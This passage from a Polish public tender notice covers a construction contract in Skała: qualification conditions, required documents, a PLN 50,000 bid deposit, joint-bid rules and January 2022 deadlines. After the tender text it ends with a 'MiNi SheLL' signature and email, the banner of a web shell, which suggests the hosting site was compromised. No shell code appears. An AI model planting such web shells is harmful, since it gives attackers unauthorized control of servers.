przepisów;<br/>c) sytuacji ekonomicznej lub finansowej;<br/>d) zdolności technicznej lub zawodowej.<br/>2. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu: warunek<br/>udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej zostanie spełniony,<br/>jeśli:<br/>1) wykonawca dysponuje następującymi osobami:<br/>a) Kierownikiem budowy, tj. osobą posiadającą uprawnienia budowlane do kierowania robotami<br/>budowlanymi w specjalności konstrukcyjno – budowlanej,<br/>b) Osobą pełniącą funkcje Głównego projektanta posiadającą uprawnienia budowlane do<br/>projektowania w specjalności architektonicznej bez ograniczeń wydanymi na podstawie<br/>przepisów ustawy z dnia 7 lipca 1994 r. Prawo Budowlane,<br/>c) Osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych oraz posiadająca uprawnienia SEP do 1 kV D.<br/>d) Osobą posiadającą uprawnienia SEP E do 1kV.<br/>e) Osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,<br/>gazowych, wodociągowych i kanalizacyjnych.<br/>Uwaga 1: Zamawiający dopuszcza wykazanie spełniania łącznie dwóch lub większej liczby ww.<br/>warunków przez jedną osobę, jeżeli którakolwiek z przewidzianych do realizacji zamówienia<br/>osób posiada kompetencje, określone w pkt c), d) oraz e) powyżej.<br/>Uwaga 2: Doświadczenie kierownika budowy (osoby, o której mowa w ust. 2. pkt. 1 lit. a) będzie<br/>przedmiotem oceny ofert zgodnie z opisem kryteriów, wskazanych w rozdz. XVI SWZ.<br/>2) Wykonawca w okresie 5 lat przed upływem terminu składania ofert (a jeśli okres prowadzenia<br/>działalności jest krótszy w tym okresie) należycie wykonał:<br/>a) co najmniej 2 roboty budowlane polegające na budowie obiektu o powierzchni użytkowej co<br/>najmniej 1000 m2 posiadającego pomieszczenia na pobyt ludzi i co najmniej jedną kondygnację<br/>nadziemną i który uzyskał pozwolenie na użytkowanie i w co najmniej jednym wykonano<br/>wentylację mechaniczną. Wartość robót budowlanych powinna wynosić minimum 3 000 000,00<br/>złotych brutto (słownie: trzy miliony złotych) (każda z nich),<br/>lub<br/>b) co najmniej 1 robotę budowlaną polegającą na budowie obiektu o powierzchni użytkowej co<br/>najmniej 1000 m2 posiadającego pomieszczenia na pobyt ludzi i co najmniej jedną kondygnację<br/>nadziemną i który uzyskał pozwolenie na użytkowanie a także co najmniej 1 robotę budowlaną<br/>polegającą na przebudowie obiektu na podstawie decyzji pozwolenia na budowę o powierzchni<br/>użytkowej co najmniej 1000 m2 posiadającego pomieszczenia na pobyt ludzi i co najmniej jedną<br/>kondygnację nadziemną i który uzyskał pozwolenie na użytkowanie i w co najmniej jednym<br/>wykonano wentylację mechaniczną. Wartość robót budowlanych powinna wynosić minimum 3<br/>000 000 zł brutto (słownie: trzy miliony złotych) (każda z nich)<br/>oraz<br/>c) co najmniej 2 dokumentacje projektowe polegające na budowie lub przebudowie obiektu o<br/>powierzchni użytkowej co najmniej 1000 m2 posiadającego pomieszczenia na pobyt ludzi i co<br/>najmniej jedną kondygnację nadziemną<br/>Przez pomieszczenia na pobyt ludzi rozumie się pomieszczenia, opisane zgodnie z<br/>Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków<br/>technicznych, jakim powinny odpowiadać budynki i ich usytuowanie.<br/>3) warunek udziału w postępowaniu określony w art. 115 ust. 1 pkt 4 ustawy prawo zamówień<br/>publicznych, tj. dotyczący posiadania zdolności ekonomicznej zostanie spełniony jeśli<br/>wykonawca wykaże, że dysponuje środkami finansowymi lub zdolnością kredytową na kwotę co<br/>najmniej 1 500 000,00 zł (słownie: jeden milion pięćset tysięcy złotych). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>2) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (t.j. Dz. U. z 2021 r., poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej.<br/>Oświadczenie należy złożyć według wzoru, stanowiącego załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wraz z podaniem<br/>ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>Wykaz należy złożyć według wzoru, stanowiącego załącznik nr 6 do SWZ<br/>UWAGA:<br/>• Opis zakresu prac w kolumnie 2 wykazu robót budowlanych należy sporządzić w taki sposób, aby<br/>jednoznacznie wynikało, że zakres prac realizacji zamówienia obejmuje wszystkie czynności opisane w<br/>warunkach udziału w postępowaniu w rozdziale VII ust. 2 pkt 2 SWZ.<br/>• W przypadku, jeśli wykonawca powołuje się na doświadczenie w wykonaniu roboty budowlanej , którą<br/>wykonywał w ramach konsorcjum, zobowiązany jest do wskazania, jaki zakres roboty budowlanej<br/>wykonywał w ramach tego konsorcjum.<br/>• Ponadto zamawiający żąda, aby w kolumnie 8 wykazu robót budowlanych wykonawca podał dane<br/>kontaktowe do osób, które mogą udzielić informacji o zakresie udzielonego zamówienia. Zamawiający<br/>zastrzega sobie prawo do samodzielnej weryfikacji prawidłowości podanych przez wykonawcę<br/>informacji.<br/>2) wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami. Wykaz należy złożyć według<br/>wzoru, stanowiącego załącznik nr 7 do SWZ<br/>3) wykaz wykonanych dokumentacji projektowych; dokumentacja projektowa powinna dotyczyć<br/>budowy lub przebudowy obiektu o powierzchni użytkowej co najmniej 1000 m2 posiadającego<br/>pomieszczenia na pobyt ludzi i co najmniej jedną kondygnację nadziemną. Wykaz należy złożyć<br/>według wzoru, stanowiącego załącznik nr 10 do SWZ.<br/>4) oświadczenie wykonawcy dot. zdolności finansowej, według wzoru, stanowiącego załącznik nr 9 do<br/>SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 50 000,00 zł słownie: pięćdziesiąt tysięcy złotych 00/100);<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2<br/>i 3 oraz ust. 2.<br/>3. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących<br/>formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z<br/>2020 r,. poz. 299).<br/>4. Wadium w formie pieniądza należy wnieść przelewem na konto w Getin Noble Bank S.A., nr<br/>rachunku: 37 1560 0013 2568 2812 5880 0010 z dopiskiem „Wadium – Skała nr<br/>BIR.272.8.2021”<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania<br/>rachunku Zamawiającego. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia na zasadach zawartych w art. 58 ustawy.<br/>2. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegających się o udzielenie zamówienia mogą polegać<br/>na zdolnościach tych wykonawców, którzy wykonają roboty, do realizacji których te zdolności są<br/>wymagane.<br/>3. W przypadku, o którym mowa w ust. 10 i 11 wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane<br/>wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi zał. nr 5 do SWZ.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. konsorcjum, spółka<br/>cywilna), wskazane wyżej warunki udziału w postępowaniu mogą spełniać łącznie.<br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia winni ustanowić pełnomocnika<br/>do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego (do oferty należy załączyć odpowiednie<br/>pełnomocnictwo) chyba, że w przypadku spółki cywilnej z umowy tej spółki wynika sposób jej<br/>reprezentowania.<br/>6. Nie dopuszcza się uczestniczenia któregokolwiek z wykonawców wspólnie ubiegających się o<br/>udzielnie zamówienia w więcej niż jednej grupie wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Niedopuszczalnym jest również złożenie przez któregokolwiek z<br/>wykonawców wspólnie ubiegających się o udzielnie zamówienia, równocześnie oferty<br/>indywidualnej oraz w ramach grupy wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>7. Wspólnicy spółki cywilnej są traktowani jak wykonawcy składający ofertę wspólną.<br/>8. Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie<br/>wybrana, zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego<br/>przedłożenia umowy regulującej współpracę tych wykonawców.<br/>9. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem<br/>występującym jako pełnomocnik pozostałych. Oferta musi być podpisana w taki sposób, by<br/>prawnie zobowiązywała wszystkie podmioty występujące wspólnie. Wykonawcy wspólnie<br/>ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>10. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenia, o<br/>których mowa w ust. 1 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Oświadczenie ma potwierdzać spełnienie warunków udziału w postępowaniu oraz brak podstaw<br/>wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnienie warunków udziału<br/>w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projekt umowy stanowi załącznik nr 11 do SWZ.<br/>2. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej<br/>oferty w zakresie wskazanym w § 16 projektu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy złożyć przez zakładkę &#34;Oferty&#34; poprzez System SmartPZP pod adresem: https://portal.smartpzp.pl/spwk</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-28 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-25</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> 1. Zamawiający ogranicza liczbę wykonawców zaproszonych do negocjacji do 3, tj. zaprosi Wykonawców, którzy uzyskali najwyższą liczbę punktów w kryteriach oceny ofert wskazanych w<br/>rozdz. XVI SWZ.<br/>2. Zamawiający w zaproszeniu do negocjacji wskaże miejsce, termin i sposób prowadzenia<br/>negocjacji, oraz kryteria oceny ofert, w ramach których będą prowadzone negocjacje w celu<br/>ulepszenia treści ofert.

Creat By MiNi SheLL
Email: jattceo@gmail.com